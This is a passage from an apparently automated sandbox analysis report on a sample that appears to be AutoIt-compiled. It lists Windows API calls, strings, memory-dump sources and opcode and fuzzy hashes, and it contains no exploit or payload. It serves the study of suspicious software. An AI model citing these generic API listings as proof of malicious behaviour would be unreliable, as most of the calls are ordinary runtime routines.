                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                  • String ID:
APIs
• _memset.LIBCMT ref: 00E1A1DC
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E1A211
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E1A22D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E1A249
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E1A273
• CLSIDFromString.COMBASE(?,?), ref: 00E1A29B
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E1A2A6
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E1A2AB
Strings
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
APIs
• __swprintf.LIBCMT ref: 00E267FD
• __swprintf.LIBCMT ref: 00E2680A
  • Part of subcall function 00E0172B: __woutput_l.LIBCMT ref: 00E01784
• FindResourceW.KERNEL32(?,?,0000000E), ref: 00E26834
• LoadResource.KERNEL32(?,00000000), ref: 00E26840
• LockResource.KERNEL32(00000000), ref: 00E2684D
• FindResourceW.KERNEL32(?,?,00000003), ref: 00E2686D
• LoadResource.KERNEL32(?,00000000), ref: 00E2687F
• SizeofResource.KERNEL32(?,00000000), ref: 00E2688E
• LockResource.KERNEL32(?), ref: 00E2689A
• CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E268F9
Strings
Similarity
• API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
• String ID: 5
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E536F4,00000010,?,Bad directive syntax error,00E7DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E225D6
• LoadStringW.USER32(00000000,?,00E536F4,00000010), ref: 00E225DD
• _wprintf.LIBCMT ref: 00E22610
• __swprintf.LIBCMT ref: 00E22632
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E226A1
Strings
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
APIs
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E27B42
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E27B58
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E27B69
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E27B7B
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E27B8C
Strings
Similarity
• API ID: SendString
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
APIs
• timeGetTime.WINMM ref: 00E27794
  • Part of subcall function 00DFDC38: timeGetTime.WINMM(?,75A8B400,00E558AB), ref: 00DFDC3C
• Sleep.KERNEL32(0000000A), ref: 00E277C0
• EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00E277E4
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00E27806
• SetActiveWindow.USER32 ref: 00E27825
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E27833
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00E27852
• Sleep.KERNEL32(000000FA), ref: 00E2785D
• IsWindow.USER32 ref: 00E27869
• EndDialog.USER32(00000000), ref: 00E2787A
Strings
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
APIs
  • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
  • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
• CoInitialize.OLE32(00000000), ref: 00E3034B
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E303DE
• SHGetDesktopFolder.SHELL32(?), ref: 00E303F2
• CoCreateInstance.COMBASE(00E6DA8C,00000000,00000001,00E93CF8,?), ref: 00E3043E
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E304AD
• CoTaskMemFree.COMBASE(?), ref: 00E30505
• _memset.LIBCMT ref: 00E30542
• SHBrowseForFolderW.SHELL32(?), ref: 00E3057E
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E305A1
• CoTaskMemFree.COMBASE(00000000), ref: 00E305A8
• CoTaskMemFree.COMBASE(00000000), ref: 00E305DF
• CoUninitialize.COMBASE ref: 00E305E1
                                                                                                                  Similarity
                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1246142700-0
                                                                                                                  • Opcode ID: 883c427a67aa10de586c6ba54bf264bbf5cc73b49d95279da45f4e5c6487471a
                                                                                                                  • Instruction ID: 9833d0957f895ebc24604da01cdb50a573708fd9a41049effcecac07c9efcb36
                                                                                                                  • Opcode Fuzzy Hash: 883c427a67aa10de586c6ba54bf264bbf5cc73b49d95279da45f4e5c6487471a
                                                                                                                  • Instruction Fuzzy Hash: 7DB1F874A00208AFDB14EFA5D898DAEBBF9FF48314F148469E905EB251DB70ED45CB60
APIs
• GetKeyboardState.USER32(?), ref: 00E22ED6
• SetKeyboardState.USER32(?), ref: 00E22F41
• GetAsyncKeyState.USER32(000000A0), ref: 00E22F61
• GetKeyState.USER32(000000A0), ref: 00E22F78
• GetAsyncKeyState.USER32(000000A1), ref: 00E22FA7
• GetKeyState.USER32(000000A1), ref: 00E22FB8
• GetAsyncKeyState.USER32(00000011), ref: 00E22FE4
• GetKeyState.USER32(00000011), ref: 00E22FF2
• GetAsyncKeyState.USER32(00000012), ref: 00E2301B
• GetKeyState.USER32(00000012), ref: 00E23029
• GetAsyncKeyState.USER32(0000005B), ref: 00E23052
• GetKeyState.USER32(0000005B), ref: 00E23060
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 5dbbf8010dfbbb172e0caf30cc6a14adf1b54819f699a0b1d0454624440614e3
• Instruction ID: 1a26a007033b6915c050ac505ddebd0c844d34478dd29ba65ed6e850b42786ba
• Instruction Fuzzy Hash: 8E510B60A047E839FB35DB70A800BEABFF45F11348F08559DD6C27A1C2DA949B4CCB62
APIs
• GetDlgItem.USER32(?,00000001), ref: 00E1ED1E
• GetWindowRect.USER32(00000000,?), ref: 00E1ED30
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E1ED8E
• GetDlgItem.USER32(?,00000002), ref: 00E1ED99
• GetWindowRect.USER32(00000000,?), ref: 00E1EDAB
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E1EE01
• GetDlgItem.USER32(?,000003E9), ref: 00E1EE0F
• GetWindowRect.USER32(00000000,?), ref: 00E1EE20
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E1EE63
• GetDlgItem.USER32(?,000003EA), ref: 00E1EE71
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E1EE8E
• InvalidateRect.USER32(?,00000000,00000001), ref: 00E1EE9B
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 12907117f9ec9c18b5cea48e636e83c0ecd0216595f1469936d86e235e3a3686
• Instruction ID: 6bbbb77bf422cdddb1dd86e877c6797670feea8f756e94c2f8ea64054f59c4b0
• Instruction Fuzzy Hash: 7B513571B00205AFDB18CF79DD85AAEBBB9FB88744F54812DF91AE7290D7B09D448B10
APIs
  • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
• GetSysColor.USER32(0000000F), ref: 00DFB438
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: 0bec827b44611b9a8e2a509eb95632febe0d1490381ca1cfedc0c2d52cafd030
• Instruction ID: 3171c689383b693c59b19b96b917c9a308b42ff62ff6eceb3b5b3a4f99b48f8e
• Instruction Fuzzy Hash: 6741F3305055089FCB205F28ED89BB93B65EB46379F59C262FEA59E1E2C7708C45CB31
APIs
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
• Opcode ID: ea085f56d319c7c4f21f180a4dad751b8a6efb3f94ca12ffa3213dea44aad94a
• Instruction ID: 4e9c98f891047929d7c56a78a8ba67503102af2919648fb50e1ad8e32711e795
• Instruction Fuzzy Hash: 18411EB684512CAFDF65DB94DC85DDFB3BCEB44300F0051A6B659B6091EA30ABE48F50
APIs
• CharLowerBuffW.USER32(00E7DC00,00E7DC00,00E7DC00), ref: 00E2D7CE
• GetDriveTypeW.KERNEL32(?,00E93A70,00000061), ref: 00E2D898
• _wcscpy.LIBCMT ref: 00E2D8C2
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: cac3e4d684fd79a4fed71501e750ec9bbf43a92e6bda47c351e899521ba06000
• Instruction ID: b95f238a155d432602e467ac3e40d12b41e8674b6cef981a65cb766999c55e08
• Instruction Fuzzy Hash: 9051C7311083449FC708EF14EC82AAFB7A5EF84314F14992DFA99672A2DB71DD05CB62
APIs
• __swprintf.LIBCMT ref: 00DE93AB
• __itow.LIBCMT ref: 00DE93DF
  • Part of subcall function 00E01557: _xtow@16.LIBCMT ref: 00E01578
Strings
Similarity
• API ID: __itow__swprintf_xtow@16
• String ID: %.15g$0x%p$False$True
• API String ID: 1502193981-2263619337
• Opcode ID: 7ed462a906c9f7c5e5da474ac778ac807c68cb8ed11d65ef28cee174e2c4b917
• Instruction ID: 20cda53052a0d1a067e6a02266baeacc669a1ccbe26393aded317dbfc7253c1a
• Instruction Fuzzy Hash: 5341FBB15052049BEB24EF75D951E79F3E4EF84308F24586EE549E71C1EA31D985CB30
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E4A259
• CreateCompatibleDC.GDI32(00000000), ref: 00E4A260
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E4A273
• SelectObject.GDI32(00000000,00000000), ref: 00E4A27B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00E4A286
• DeleteDC.GDI32(00000000), ref: 00E4A28F
• GetWindowLongW.USER32(?,000000EC), ref: 00E4A299
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E4A2AD
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E4A2B9
Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 2559357485-2160076837
                                                                                                                  • Opcode ID: 6129b629cd37eec73d0cec50ebcdcac776419ea3cc1e2947657934f9bff41d4d
                                                                                                                  • Instruction ID: c142c580ad7d7b04e6148fbb3ea63ca19298ca4d2129f443eb1b97151741796f
                                                                                                                  • Opcode Fuzzy Hash: 6129b629cd37eec73d0cec50ebcdcac776419ea3cc1e2947657934f9bff41d4d
                                                                                                                  • Instruction Fuzzy Hash: 35318B31645215AFDB115FA5EC09FEB3B69FF0E3A4F140224FA19B21A0C7B1D811DBA4
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 2620052-3771769585
• Opcode ID: 02a87938e8e1dc0a8d843ec0ad190cc959e74f5d56be49d08d1ffb13869109ef
• Instruction ID: ea40134f161296a0f9ce25727f2d0ef186d0d07c8c0693ac6d73448ac503991c
• Opcode Fuzzy Hash: 02a87938e8e1dc0a8d843ec0ad190cc959e74f5d56be49d08d1ffb13869109ef
• Instruction Fuzzy Hash: 18112732A08228AFDF14AB71BD4AEDA77ACEF00714F011166F105B6080EFB0EA848661
APIs
• _memset.LIBCMT ref: 00E05047
  • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
• __gmtime64_s.LIBCMT ref: 00E050E0
• __gmtime64_s.LIBCMT ref: 00E05116
• __gmtime64_s.LIBCMT ref: 00E05133
• __allrem.LIBCMT ref: 00E05189
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E051A5
• __allrem.LIBCMT ref: 00E051BC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E051DA
• __allrem.LIBCMT ref: 00E051F1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E0520F
• __invoke_watson.LIBCMT ref: 00E05280
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
• Instruction ID: be9a6410362df141204b8e564572d94e762da61081f325f0a1f0dfd99aaf85c5
• Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
• Instruction Fuzzy Hash: F171A473A01B16ABE714AE68CC41BABB3F9AF54764F14522AE510F62C1E770D9C08FD0
APIs
• _memset.LIBCMT ref: 00E24DF8
• GetMenuItemInfoW.USER32(00EA1708,000000FF,00000000,00000030), ref: 00E24E59
• SetMenuItemInfoW.USER32(00EA1708,00000004,00000000,00000030), ref: 00E24E8F
• Sleep.KERNEL32(000001F4), ref: 00E24EA1
• GetMenuItemCount.USER32(?), ref: 00E24EE5
• GetMenuItemID.USER32(?,00000000), ref: 00E24F01
• GetMenuItemID.USER32(?,-00000001), ref: 00E24F2B
• GetMenuItemID.USER32(?,?), ref: 00E24F70
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E24FB6
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E24FCA
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E24FEB
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: 59a3f14b1ca42c03bfd55125765a4d65475fca9c6e7ed3a0b57a2eee4150191c
• Instruction ID: 8de86c9555ff1395c4a58c512622af421606943c2cab5f97d21df95138a44e4d
• Opcode Fuzzy Hash: 59a3f14b1ca42c03bfd55125765a4d65475fca9c6e7ed3a0b57a2eee4150191c
• Instruction Fuzzy Hash: 6261A1B1A00269EFEB11CF64EE84AAE7BB8FB45348F152059F442B7291D771AD04CB20
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00E194FE
• SafeArrayAllocData.OLEAUT32(?), ref: 00E19549
• VariantInit.OLEAUT32(?), ref: 00E1955B
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00E1957B
• VariantCopy.OLEAUT32(?,?), ref: 00E195BE
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00E195D2
• VariantClear.OLEAUT32(?), ref: 00E195E7
• SafeArrayDestroyData.OLEAUT32(?), ref: 00E195F4
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E195FD
• VariantClear.OLEAUT32(?), ref: 00E1960F
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E1961A
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: afb53370047c70f2e63947061c4eb92be229ff8df43ac2c9c7203c7f79756d07
• Instruction ID: 6da1b94900375f57305e7ae5fdc87f3d69ab4dc58256ab207f66c2da225dd320
• Opcode Fuzzy Hash: afb53370047c70f2e63947061c4eb92be229ff8df43ac2c9c7203c7f79756d07
• Instruction Fuzzy Hash: 10413071E00219AFCB01DFA5DC589EEBBB9FF08354F408065E511B7251DB70AA85CBA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?$|?
• API String ID: 2862541840-300242882
• Opcode ID: b4a5f503a6b5e1fbeee04ffafa9237d6b7030f63b4b9a6cf6d46a36c33d3d86e
• Instruction ID: 9bff055f00b7e605528e8740586de70cf42b4857ecc03dee755d047322412b38
• Opcode Fuzzy Hash: b4a5f503a6b5e1fbeee04ffafa9237d6b7030f63b4b9a6cf6d46a36c33d3d86e
• Instruction Fuzzy Hash: 21918171A00219ABDF24CFA5D848FEEBBB8EF85714F109559F616BB180DB709944CBA0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                  • CoInitialize.OLE32 ref: 00E3ADF6
                                                                                                                  • CoUninitialize.COMBASE ref: 00E3AE01
                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000017,00E6D8FC,?), ref: 00E3AE61
                                                                                                                  • IIDFromString.COMBASE(?,?), ref: 00E3AED4
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00E3AF6E
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E3AFCF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                  • API String ID: 834269672-1287834457
                                                                                                                  • Opcode ID: 99b46169777ef41e3c7f069c87e80febe28174007a865b419ac0da694caca460
                                                                                                                  • Instruction ID: a02b47e50f49b36b0cf0423d31220b89870e78420f45ad4ac080c9a566bf35a0
                                                                                                                  • Opcode Fuzzy Hash: 99b46169777ef41e3c7f069c87e80febe28174007a865b419ac0da694caca460
                                                                                                                  • Instruction Fuzzy Hash: C5619B717083119FC710EF55D848BAABBE8EF49754F085429F985AB291C770ED88CBA3
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 00E38168
                                                                                                                  • inet_addr.WS2_32(?), ref: 00E381AD
                                                                                                                  • gethostbyname.WS2_32(?), ref: 00E381B9
                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00E381C7
                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E38237
                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E3824D
                                                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E382C2
                                                                                                                  • WSACleanup.WS2_32 ref: 00E382C8
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                  • String ID: Ping
                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                  • Opcode ID: 10c873917bcd34ed62969eed140886881242440213ccdb5e83f50761a610564f
                                                                                                                  • Instruction ID: b0e16bd859227887f6d6260228100ecb24659648f4180ff3dcd7c78496b59e81
                                                                                                                  • Opcode Fuzzy Hash: 10c873917bcd34ed62969eed140886881242440213ccdb5e83f50761a610564f
                                                                                                                  • Instruction Fuzzy Hash: 1A51C1316047009FDB20AF65DD49B6BBBE4EF48314F04982AFA55E72A1DF70E804CB52
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00E2E396
                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E2E40C
                                                                                                                  • GetLastError.KERNEL32 ref: 00E2E416
                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00E2E483
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                  • Opcode ID: c1589613cc78fa22be8bcdf879190837810f9920ad730d445fbf19cc66ea34d7
                                                                                                                  • Instruction ID: c293c01aeb790ab5e03c13d87515617177caf4a5fc49e7c8fe684dd97771f39f
                                                                                                                  • Opcode Fuzzy Hash: c1589613cc78fa22be8bcdf879190837810f9920ad730d445fbf19cc66ea34d7
                                                                                                                  • Instruction Fuzzy Hash: 5A319235A002299FDB01FB64EC45EAEB7B4EF18348F149015E515FB391DB70AE02C761
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E1B98C
                                                                                                                  • GetDlgCtrlID.USER32 ref: 00E1B997
                                                                                                                  • GetParent.USER32 ref: 00E1B9B3
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E1B9B6
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00E1B9BF
                                                                                                                  • GetParent.USER32(?), ref: 00E1B9DB
                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E1B9DE
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 1383977212-1403004172
                                                                                                                  • Opcode ID: 731077da2df37fc8eae44cecf1cfe05c22b74e1099acc286e710d5d1bedc7c36
                                                                                                                  • Instruction ID: da029c2c727d62db61bcda1deb673b57a2289d0741f873e1e0e996a8e937b63d
                                                                                                                  • Opcode Fuzzy Hash: 731077da2df37fc8eae44cecf1cfe05c22b74e1099acc286e710d5d1bedc7c36
                                                                                                                  • Instruction Fuzzy Hash: 7521F1B0A00104BFCF00ABA5DC82EFEBBB5EB49310B004119F651B72A1DBB4485A9B30
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E1BA73
                                                                                                                  • GetDlgCtrlID.USER32 ref: 00E1BA7E
                                                                                                                  • GetParent.USER32 ref: 00E1BA9A
